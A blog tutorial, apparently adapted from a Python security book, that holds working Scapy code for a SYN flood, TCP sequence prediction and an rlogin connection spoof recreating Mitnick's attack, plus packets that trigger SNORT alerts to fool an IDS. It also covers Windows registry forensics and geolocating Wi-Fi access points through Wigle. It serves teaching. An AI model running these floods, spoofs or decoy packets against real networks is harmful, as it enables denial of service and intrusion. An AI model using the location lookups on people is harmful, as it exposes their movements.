        <span class="k">if</span> <span class="n">rcode</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[!] Name request lookup failed: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">qname</span><span class="p">))</span>
            <span class="k">return</span> <span class="bp">True</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="k">return</span> <span class="bp">False</span>

<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">un_ans_reqs</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">pkts</span> <span class="o">=</span> <span class="n">rdpcap</span><span class="p">(</span><span class="s">"domain_flux.pcap"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">pkt</span> <span class="ow">in</span> <span class="n">pkts</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">dns_qrtest</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
            <span class="n">un_ans_reqs</span> <span class="o">=</span> <span class="n">un_ans_reqs</span> <span class="o">+</span> <span class="mi">1</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[!] {} Total Unanswered Name Requests"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">un_ans_reqs</span><span class="p">))</span>
</code></pre></div></div>
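
<p>A single total does not show which machine is producing the failed lookups. One possible refinement, sketched here on synthetic data, is to count name-error responses per client. The tuple layout (client address, query name, rcode) and the helper name <code class="language-plaintext highlighter-rouge">count_failed_lookups</code> are assumptions for this illustration; with Scapy the client would be the destination address of the response packet.</p>

```python
from collections import Counter

NXDOMAIN = 3  # DNS rcode meaning "name does not exist"


def count_failed_lookups(responses):
    """Count NXDOMAIN responses per client from (client, qname, rcode) tuples."""
    failures = Counter()
    for client, qname, rcode in responses:
        if rcode == NXDOMAIN:
            failures[client] += 1
    return failures


# Synthetic responses: one client hits many nonexistent names, the other does not
responses = [
    ("192.0.2.20", "aaqhxk.example.", 3),
    ("192.0.2.20", "bzplrw.example.", 3),
    ("192.0.2.20", "cnvteu.example.", 3),
    ("192.0.2.21", "www.example.", 0),
]

for client, n in count_failed_lookups(responses).most_common():
    print("[!] {} had {} failed name lookups".format(client, n))
```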

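<h2 id="kevin-mitnick-和-tcp-序列号预测">Kevin Mitnick and TCP Sequence Number Prediction</h2>

<p>Mitnick used a method of hijacking TCP sessions known as TCP sequence number prediction. It exploits a lack of randomness in the generation of TCP sequence numbers, which were designed to keep individual network connections apart. Combined with IP address spoofing, this flaw allowed Mitnick to hijack a connection to a home computer.</p>

<h3 id="预测你自己的-tcp-序列号">Predicting Your Own TCP Sequence Numbers</h3>

<p>The machine Mitnick attacked had a trust relationship with a remote server. The remote server could access the victim machine through the remote login protocol (rlogin), which runs on TCP port 513. Rather than using a public/private key scheme or password authentication, rlogin relied on a weaker form of authentication: the source IP address.</p>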

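<p>To attack the machine, Mitnick had to do four things:</p>

<p>(1) Find a trusted server.</p>

<p>(2) Silence that server so it could no longer respond.</p>

<p>(3) Spoof a connection from the server.</p>

<p>(4) Blindly spoof a proper acknowledgement of the TCP three-way handshake.</p>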

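<p>After finding the remote server that had a trust relationship with the personal computer, Mitnick needed to keep that server from responding. If the remote server noticed someone attempting a spoofed connection using its IP address, it would send a TCP reset packet to close the connection. To silence the server, Mitnick sent many TCP SYN packets to its rlogin port. This is a SYN flood, an attack that fills the server's connection queue so that it cannot respond.</p>

<h3 id="使用-scapy-制造-syn-泛洪攻击">Crafting a SYN Flood with Scapy</h3>

<p>To reproduce the SYN flood with Scapy, craft IP packets carrying a TCP layer in which the TCP source port keeps incrementing by one while the destination TCP port is always 513.</p>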

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>

<span class="k">def</span> <span class="nf">syn_flood</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">target</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">sport</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1024</span><span class="p">,</span> <span class="mi">65535</span><span class="p">):</span>
        <span class="n">ip_layer</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">target</span><span class="p">)</span>
        <span class="n">tcp_layer</span> <span class="o">=</span> <span class="n">TCP</span><span class="p">(</span><span class="n">sport</span><span class="o">=</span><span class="n">sport</span><span class="p">,</span> <span class="n">dport</span><span class="o">=</span><span class="mi">513</span><span class="p">)</span>
        <span class="n">pkt</span> <span class="o">=</span> <span class="n">ip_layer</span> <span class="o">/</span> <span class="n">tcp_layer</span>
        <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">)</span>
<span class="n">src</span> <span class="o">=</span> <span class="s">"10.1.1.2"</span>
<span class="n">target</span> <span class="o">=</span> <span class="s">"192.168.1.3"</span>
<span class="n">syn_flood</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">target</span><span class="p">)</span>
</code></pre></div></div>
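<h3 id="计算-tcp-序列号">Calculating TCP Sequence Numbers</h3>

<p>Mitnick could now spoof a TCP connection to the target. This depended on his ability to send a spoofed SYN packet, after which the victim machine would reply with a TCP SYN-ACK to acknowledge the connection. To complete the connection, Mitnick had to guess the TCP sequence number in that SYN-ACK correctly (since he could not observe it) and send the correctly guessed number back in an ACK packet.</p>

<p>To reproduce this in Python, send a TCP SYN packet and wait for the TCP SYN-ACK. When it arrives, read the TCP sequence number from it and print it. The function <code class="language-plaintext highlighter-rouge">cal_tsn</code> takes the target IP address as its parameter and returns the predicted sequence number of the next SYN-ACK (the sequence number of the current SYN-ACK plus the difference).</p>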

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">cal_tsn</span><span class="p">(</span><span class="n">target</span><span class="p">):</span>
    <span class="n">seq_num</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">pre_num</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">diff_seq</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">5</span><span class="p">):</span>
        <span class="k">if</span> <span class="n">seq_num</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>  <span class="c1"># remember the previous reply before sending the next probe</span>
            <span class="n">pre_num</span> <span class="o">=</span> <span class="n">seq_num</span>
        <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">dst</span><span class="o">=</span><span class="n">target</span><span class="p">)</span> <span class="o">/</span> <span class="n">TCP</span><span class="p">()</span>
        <span class="n">ans</span> <span class="o">=</span> <span class="n">sr1</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">verbose</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span>
        <span class="n">seq_num</span> <span class="o">=</span> <span class="n">ans</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">TCP</span><span class="p">).</span><span class="n">seq</span>
        <span class="n">diff_seq</span> <span class="o">=</span> <span class="n">seq_num</span> <span class="o">-</span> <span class="n">pre_num</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] TCP Seq Difference: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">diff_seq</span><span class="p">))</span>
    <span class="k">return</span> <span class="n">seq_num</span> <span class="o">+</span> <span class="n">diff_seq</span>

<span class="n">target</span> <span class="o">=</span> <span class="s">"192.168.1.106"</span>
<span class="n">seq_num</span> <span class="o">=</span> <span class="n">cal_tsn</span><span class="p">(</span><span class="n">target</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"[+] Next TCP Sequence Number to ACK is: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">seq_num</span> <span class="o">+</span> <span class="mi">1</span><span class="p">))</span>
</code></pre></div></div>
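
<p>The arithmetic behind the prediction can be tried without sending any packets. The following is a minimal sketch, assuming the target raises its sequence number by a constant step between connections; the helper name <code class="language-plaintext highlighter-rouge">predict_next_seq</code> and the sample numbers are hypothetical and not taken from a real capture.</p>

```python
SEQ_MODULUS = 2 ** 32  # TCP sequence numbers are 32-bit and wrap around


def predict_next_seq(samples):
    """Extrapolate the next sequence number from the last two observed ones.

    Assumes the target increments its sequence number by a constant step
    per connection, which is the weakness this section relies on.
    """
    if len(samples) in (0, 1):
        raise ValueError("need at least two observed sequence numbers")
    step = (samples[-1] - samples[-2]) % SEQ_MODULUS
    return (samples[-1] + step) % SEQ_MODULUS


# Hypothetical sequence numbers, as if read from three SYN-ACK replies.
observed = [2024115201, 2024243201, 2024371201]
next_seq = predict_next_seq(observed)
print("[+] Predicted next sequence number: {}".format(next_seq))
# The ACK field carries the peer's sequence number plus one.
print("[+] Value to place in the ACK field: {}".format((next_seq + 1) % SEQ_MODULUS))
```

<p>Taking the step modulo 2**32 keeps the prediction valid when the counter wraps around, a case that plain subtraction would get wrong.</p>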

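<h3 id="伪造-tcp-连接">Spoofing the TCP Connection</h3>

<p>To reproduce this behaviour in Python, we create and send two packets. First, we create a SYN packet with TCP source port 513, destination port 514, the impersonated server as the source IP address, and the attacked machine as the destination IP address. Next, we create an ACK packet with the same addresses and ports, fill the calculated sequence number into its acknowledgment field, and send it.</p>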

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>

<span class="k">def</span> <span class="nf">spoof_conn</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">target</span><span class="p">,</span> <span class="n">ack</span><span class="p">):</span>
    <span class="n">ip_layer</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">target</span><span class="p">)</span>
    <span class="n">tcp_layer</span> <span class="o">=</span> <span class="n">TCP</span><span class="p">(</span><span class="n">sport</span><span class="o">=</span><span class="mi">513</span><span class="p">,</span> <span class="n">dport</span><span class="o">=</span><span class="mi">514</span><span class="p">)</span>
    <span class="n">syn_pkt</span> <span class="o">=</span> <span class="n">ip_layer</span> <span class="o">/</span> <span class="n">tcp_layer</span>
    <span class="n">send</span><span class="p">(</span><span class="n">syn_pkt</span><span class="p">)</span>
    <span class="n">ip_layer</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">target</span><span class="p">)</span>
    <span class="n">tcp_layer</span> <span class="o">=</span> <span class="n">TCP</span><span class="p">(</span><span class="n">sport</span><span class="o">=</span><span class="mi">513</span><span class="p">,</span> <span class="n">dport</span><span class="o">=</span><span class="mi">514</span><span class="p">,</span> <span class="n">flags</span><span class="o">=</span><span class="s">"A"</span><span class="p">,</span> <span class="n">ack</span><span class="o">=</span><span class="n">ack</span><span class="p">)</span>  <span class="c1"># Scapy's TCP() defaults to SYN; set the ACK flag explicitly</span>
    <span class="n">ack_pkt</span> <span class="o">=</span> <span class="n">ip_layer</span> <span class="o">/</span> <span class="n">tcp_layer</span>
    <span class="n">send</span><span class="p">(</span><span class="n">ack_pkt</span><span class="p">)</span>

<span class="n">src</span> <span class="o">=</span> <span class="s">"10.1.1.2"</span>
<span class="n">target</span> <span class="o">=</span> <span class="s">"192.168.1.106"</span>
<span class="n">seq_num</span> <span class="o">=</span> <span class="mi">2024371201</span>
<span class="n">spoof_conn</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">target</span><span class="p">,</span> <span class="n">seq_num</span><span class="p">)</span>
</code></pre></div></div>

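<h2 id="使用-scapy-愚弄入侵检测系统">Fooling Intrusion Detection Systems with Scapy</h2>

<p>An intrusion detection system (IDS), and in particular a network-based intrusion detection system (NIDS), analyzes traffic in real time by logging the packets that cross an IP network. By scanning packets against known malicious signatures, an IDS can alert a network analyst before an attack succeeds. The SNORT IDS ships with many rules that let it recognize real-world attack techniques, including various kinds of reconnaissance, exploits, and denial-of-service attacks. Looking at one of its rule files, we find four alert rules for the TFN, tfn2k, and Trin00 distributed denial-of-service toolkits.</p>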

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cat</span> /etc/snort/rules/ddos.rules
</code></pre></div></div>

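<p>The first alert rule is the DDoS TFN Probe. The function below crafts one packet for it, followed by one packet for each of the remaining three rules.</p>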

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">ddos_test</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">,</span> <span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="p">):</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">dst</span><span class="p">)</span> <span class="o">/</span> <span class="n">ICMP</span><span class="p">(</span><span class="nb">type</span><span class="o">=</span><span class="mi">8</span><span class="p">,</span><span class="nb">id</span><span class="o">=</span><span class="mi">678</span><span class="p">)</span> <span class="o">/</span> <span class="n">Raw</span><span class="p">(</span><span class="n">load</span><span class="o">=</span><span class="s">"1234"</span><span class="p">)</span>
    <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">iface</span><span class="o">=</span><span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="o">=</span><span class="n">count</span><span class="p">)</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">dst</span><span class="p">)</span> <span class="o">/</span> <span class="n">ICMP</span><span class="p">(</span><span class="nb">type</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span> <span class="o">/</span> <span class="n">Raw</span><span class="p">(</span><span class="n">load</span><span class="o">=</span><span class="s">"AAAAAAAAA"</span><span class="p">)</span>
    <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">iface</span><span class="o">=</span><span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="o">=</span><span class="n">count</span><span class="p">)</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">dst</span><span class="p">)</span> <span class="o">/</span> <span class="n">UDP</span><span class="p">(</span><span class="n">dport</span><span class="o">=</span><span class="mi">31335</span><span class="p">)</span> <span class="o">/</span> <span class="n">Raw</span><span class="p">(</span><span class="n">load</span><span class="o">=</span><span class="s">"PONG"</span><span class="p">)</span>
    <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">iface</span><span class="o">=</span><span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="o">=</span><span class="n">count</span><span class="p">)</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">dst</span><span class="p">)</span> <span class="o">/</span> <span class="n">ICMP</span><span class="p">(</span><span class="nb">type</span><span class="o">=</span><span class="mi">0</span><span class="p">,</span> <span class="nb">id</span><span class="o">=</span><span class="mi">456</span><span class="p">)</span>
    <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">iface</span><span class="o">=</span><span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="o">=</span><span class="n">count</span><span class="p">)</span>
    
<span class="n">src</span> <span class="o">=</span> <span class="s">"1.3.3.7"</span>
<span class="n">dst</span> <span class="o">=</span> <span class="s">"192.168.1.106"</span>
<span class="n">iface</span> <span class="o">=</span> <span class="s">"eth0"</span>
<span class="n">count</span> <span class="o">=</span> <span class="mi">1</span>
<span class="n">ddos_test</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">,</span> <span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="p">)</span>
</code></pre></div></div>

<p>Next, consider the more complex alert rules in SNORT's <code class="language-plaintext highlighter-rouge">exploit.rules</code> signature file:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">exploit_test</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">,</span> <span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="p">):</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">dst</span><span class="p">)</span> <span class="o">/</span> <span class="n">UDP</span><span class="p">(</span><span class="n">dport</span><span class="o">=</span><span class="mi">518</span><span class="p">)</span> <span class="o">/</span> <span class="n">Raw</span><span class="p">(</span><span class="n">load</span><span class="o">=</span><span class="s">"</span><span class="se">\x01\x03\x00</span><span class="s">..."</span><span class="p">)</span>
    <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">iface</span><span class="o">=</span><span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="o">=</span><span class="n">count</span><span class="p">)</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">dst</span><span class="p">)</span> <span class="o">/</span> <span class="n">UDP</span><span class="p">(</span><span class="n">dport</span><span class="o">=</span><span class="mi">635</span><span class="p">)</span> <span class="o">/</span> <span class="n">Raw</span><span class="p">(</span><span class="n">load</span><span class="o">=</span><span class="s">"^</span><span class="se">\xB0\x02</span><span class="s">..."</span><span class="p">)</span>
    <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">iface</span><span class="o">=</span><span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="o">=</span><span class="n">count</span><span class="p">)</span>
</code></pre></div></div>

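<p>Finally, it is also worth faking some reconnaissance or scanning activity. Among SNORT's scan rules there are two for which matching packets are easy to generate. Both rules check whether packets sent to particular UDP ports contain a particular signature in their payload, and raise an alert if they do.</p>

<p>The following generates two packets that trigger the cybercop scanner and Amanda scanner alerts:</p>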
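
<p>To see why such packets raise alerts, it helps to picture a content rule as a port plus a byte signature. The sketch below is a deliberately simplified, hypothetical matcher and not SNORT's rule engine; the <code class="language-plaintext highlighter-rouge">RULES</code> table and the <code class="language-plaintext highlighter-rouge">match_rules</code> helper are illustrative assumptions, using the ports and signatures of the two scanner packets in this section.</p>

```python
# Hypothetical, simplified stand-ins for two content-based rules:
# (UDP destination port, byte signature, alert message)
RULES = [
    (7, b"cybercop", "cybercop signature on UDP/7"),
    (10080, b"Amanda", "Amanda signature on UDP/10080"),
]


def match_rules(dport, payload, rules=RULES):
    """Return the message of every rule whose port and signature both match."""
    return [msg for port, sig, msg in rules if port == dport and sig in payload]


# A payload carrying the signature on the watched port raises an alert...
print(match_rules(7, b"xxcybercopxx"))
# ...while the same payload on another port does not.
print(match_rules(53, b"xxcybercopxx"))
```

<p>Because the match depends only on the port and the payload bytes, any sender who can craft such a packet can trigger the alert, whether or not a real scanner is running.</p>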

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">scan_test</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">,</span> <span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="p">):</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">dst</span><span class="p">)</span> <span class="o">/</span> <span class="n">UDP</span><span class="p">(</span><span class="n">dport</span><span class="o">=</span><span class="mi">7</span><span class="p">)</span> <span class="o">/</span> <span class="n">Raw</span><span class="p">(</span><span class="n">load</span><span class="o">=</span><span class="s">"cybercop"</span><span class="p">)</span>
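    <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">iface</span><span class="o">=</span><span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="o">=</span><span class="n">count</span><span class="p">)</span>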
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">dst</span><span class="p">)</span> <span class="o">/</span> <span class="n">UDP</span><span class="p">(</span><span class="n">dport</span><span class="o">=</span><span class="mi">10080</span><span class="p">)</span> <span class="o">/</span> <span class="n">Raw</span><span class="p">(</span><span class="n">load</span><span class="o">=</span><span class="s">"Amanda"</span><span class="p">)</span>
    <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">iface</span><span class="o">=</span><span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="o">=</span><span class="n">count</span><span class="p">)</span>
</code></pre></div></div>]]></content><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><category term="python" /><category term="cybersecurity" /><category term="network" /><summary type="html"><![CDATA[Analyzing network traffic with Python]]></summary></entry><entry><title type="html">Forensic Investigations with Python</title><link href="https://crabin.github.io/posts/2024/08/Forensic%20Investigations%20with%20Python/" rel="alternate" type="text/html" title="Forensic Investigations with Python" /><published>2024-08-21T00:00:00+00:00</published><updated>2024-08-21T00:00:00+00:00</updated><id>https://crabin.github.io/posts/2024/08/Forensic%20Investigations%20with%20Python</id><content type="html" xml:base="https://crabin.github.io/posts/2024/08/Forensic%20Investigations%20with%20Python/"><![CDATA[<h2 id="用-python-进行取证调查">Forensic Investigations with Python</h2>

<h2 id="你曾经去过哪里在注册表中分析无线访问热点">Where Have You Been? Analyzing Wireless Access Points in the Registry</h2>

<p>The Windows registry is a hierarchical database that stores the operating system's configuration settings.</p>

<p>Starting with <code class="language-plaintext highlighter-rouge">Windows Vista</code>, the registry stores all network information under the <code class="language-plaintext highlighter-rouge">HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged</code> subkey. From the Windows command prompt we can list, for each network, its <code class="language-plaintext highlighter-rouge">ProfileGuid</code>, its description, the network name, and the gateway's MAC address.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt;reg query <span class="s2">"HKEY_LOCAL_MACHINE</span><span class="se">\S</span><span class="s2">OFTWARE</span><span class="se">\M</span><span class="s2">icrosoft</span><span class="se">\W</span><span class="s2">indows NT</span><span class="se">\C</span><span class="s2">urrentVersion</span><span class="se">\N</span><span class="s2">etworkList</span><span class="se">\S</span><span class="s2">ignatures</span><span class="se">\U</span><span class="s2">nmanaged"</span> /s
HKEY_LOCAL_MACHINE<span class="se">\S</span>OFTWARE<span class="se">\M</span>icrosoft<span class="se">\W</span>indows NT<span class="se">\C</span>urrentVersion<span class="se">\N</span>etworkList<span class="se">\S</span>ignatures<span class="se">\U</span>nmanaged<span class="se">\0</span>10103000F0000F008000000F0000F04BCC2360E4B8F7DC8BDAFAB8AE....

ProfileGuid	REG_SZ	...
Description	REG_SZ	...
</code></pre></div></div>

<h3 id="使用-winreg-读取-windows-注册表中的内容">Reading the Windows Registry with WinReg</h3>

<p>The registry stores the gateway MAC address as a <code class="language-plaintext highlighter-rouge">REG_BINARY</code> value. A value such as <code class="language-plaintext highlighter-rouge">00115024687F0000</code> is really the address <code class="language-plaintext highlighter-rouge">00:11:50:24:68:7F</code>. The following function performs the conversion:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">val2addr</span><span class="p">(</span><span class="n">val</span><span class="p">):</span>
    <span class="n">addr</span> <span class="o">=</span> <span class="nb">str</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">ch</span> <span class="ow">in</span> <span class="nb">bytearray</span><span class="p">(</span><span class="n">val</span><span class="p">):</span>  <span class="c1"># yields integers on both Python 2 and Python 3</span>
        <span class="n">addr</span> <span class="o">+=</span> <span class="s">"%02x "</span> <span class="o">%</span> <span class="n">ch</span>
    <span class="n">addr</span> <span class="o">=</span> <span class="n">addr</span><span class="p">.</span><span class="n">strip</span><span class="p">(</span><span class="s">" "</span><span class="p">).</span><span class="n">replace</span><span class="p">(</span><span class="s">" "</span><span class="p">,</span> <span class="s">":"</span><span class="p">)[</span><span class="mi">0</span><span class="p">:</span><span class="mi">17</span><span class="p">]</span>
    <span class="k">return</span> <span class="n">addr</span>
</code></pre></div></div>
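
<p>The conversion can be checked against the sample value quoted above without touching the registry. This is a minimal Python 3 sketch, assuming the <code class="language-plaintext highlighter-rouge">REG_BINARY</code> value arrives as a <code class="language-plaintext highlighter-rouge">bytes</code> object; the helper name <code class="language-plaintext highlighter-rouge">bytes_to_mac</code> is hypothetical.</p>

```python
def bytes_to_mac(val):
    """Format the first six bytes of a REG_BINARY value as a MAC address."""
    return ":".join("%02x" % b for b in bytearray(val)[:6])


# The sample registry value from the text, decoded from its hex form.
raw = bytes.fromhex("00115024687F0000")
print(bytes_to_mac(raw))
```

<p>Slicing to six bytes drops the two padding bytes at the end of the registry value, which is what the <code class="language-plaintext highlighter-rouge">[0:17]</code> slice achieves on the formatted string.</p>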

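<p>Next, we extract each listed network name and MAC address from the registry key above. This requires the <code class="language-plaintext highlighter-rouge">_winreg</code> library, which the Windows installer for Python installs by default (Python 3 renames the module to <code class="language-plaintext highlighter-rouge">winreg</code>).</p>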

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">_winreg</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">print_nets</span><span class="p">():</span>
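    <span class="n">net</span> <span class="o">=</span> <span class="sa">r</span><span class="s">"SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged"</span>  <span class="c1"># raw string: \N and \U would be parsed as escape sequences on Python 3</span>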
    <span class="n">key</span> <span class="o">=</span> <span class="n">OpenKey</span><span class="p">(</span><span class="n">HKEY_LOCAL_MACHINE</span><span class="p">,</span> <span class="n">net</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[*] Networks You have Joined."</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">100</span><span class="p">):</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">guid</span> <span class="o">=</span> <span class="n">EnumKey</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">i</span><span class="p">)</span>
            <span class="n">net_key</span> <span class="o">=</span> <span class="n">OpenKey</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">guid</span><span class="p">))</span>
            <span class="n">n</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">t</span> <span class="o">=</span> <span class="n">EnumValue</span><span class="p">(</span><span class="n">net_key</span><span class="p">,</span> <span class="mi">5</span><span class="p">)</span>
            <span class="n">n</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">t</span> <span class="o">=</span> <span class="n">EnumValue</span><span class="p">(</span><span class="n">net_key</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span>
            <span class="n">mac_addr</span> <span class="o">=</span> <span class="n">val2addr</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span>
            <span class="n">net_name</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">name</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] {} {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">net_name</span><span class="p">,</span> <span class="n">mac_addr</span><span class="p">))</span>
            <span class="n">CloseKey</span><span class="p">(</span><span class="n">net_key</span><span class="p">)</span>
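        <span class="k">except</span> <span class="nb">OSError</span><span class="p">:</span>  <span class="c1"># EnumKey raises OSError once the index passes the last subkey</span>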
            <span class="k">break</span>
</code></pre></div></div>

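<p>Run the script from a command prompt with administrator privileges so that it can read these registry keys.</p>

<h3 id="使用-mechanize-把-mac-地址传给-wigle">Submitting the MAC Address to Wigle with Mechanize</h3>

<p>Once we know a wireless access point's MAC address, we can also print its physical location. Several databases hold vast lists that map wireless access points to their physical locations.</p>

<p>The <a href="http://www.skyhookwireless.com">SkyHook database</a> provides a software development kit for obtaining geolocation information from Wi-Fi positions. An <a href="http://code.google.com/p/maclocate/">open-source project</a> developed by Ian McCracken gives access to this database. Google, Microsoft, and others maintain Wi-Fi geolocation databases as well.</p>

<p>The Wigle database, also an <a href="http://wigle.net">open-source project</a>, still lets users look up an access point's physical location from its MAC address. We query the web page for the location of a given access point's MAC address and collect the response page. In the returned result, <code class="language-plaintext highlighter-rouge">maplat=47.25264359&amp;maplon=-87.25624084</code> gives the access point's latitude and longitude.</p>

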